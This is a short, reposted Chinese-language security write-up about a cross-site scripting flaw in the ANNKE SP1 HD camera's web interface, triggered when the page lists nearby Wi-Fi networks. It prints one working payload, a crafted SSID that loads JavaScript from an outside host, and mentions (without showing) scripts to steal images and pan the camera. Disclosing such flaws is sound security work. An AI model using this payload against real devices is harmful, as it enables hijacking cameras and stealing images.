如何通過XSS入侵網絡攝像頭
- 2019 年 11 月 20 日
- 筆記
1
Start
我們在ANNKE SP1 HD無線攝像頭(固件版本v3.4.1.1604071109)中發現了一個風險較低但十分有趣的XSS。有趣的是,在Annke Web界面中查看可用的Wi-Fi接入點時會觸發XSS。
因此,如果在攝像頭的WIFI範圍內有如下SSID:
"<script src=//xjs.io></script>
當受害者訪問無線配置頁面時,SP1相機將加載並運行在http://xjs.io/上的JavaScript代碼。這是因為他掃描了附近的無線網絡,並將能夠連接的SSID直接顯示在了頁面上。
2
如何利用
為了驗證我們的想法,我們編寫一個腳本來從相機中竊取圖像。

利用XSS獲取圖像:

官方可能已經修復了它,顯然,人們現在需要開始關心物理接近利用這個問題,雖然它並不是一個巨大的漏洞。但它確實說明供應商需要小心驗證來自任何源的輸入,而不僅僅是Web界面上的GET/POST參數。
3
做點更有趣的事情
如果你想做點更有意思的事,可以使用這個腳本https://github.com/pentestpartners/bits-for-blog/blob/master/annke-spin.js讓攝像頭進行平移。
附上代碼:


本文翻譯自:

作者:物聯網IOT安全 (文章轉載請註明來自:IT同路人論壇)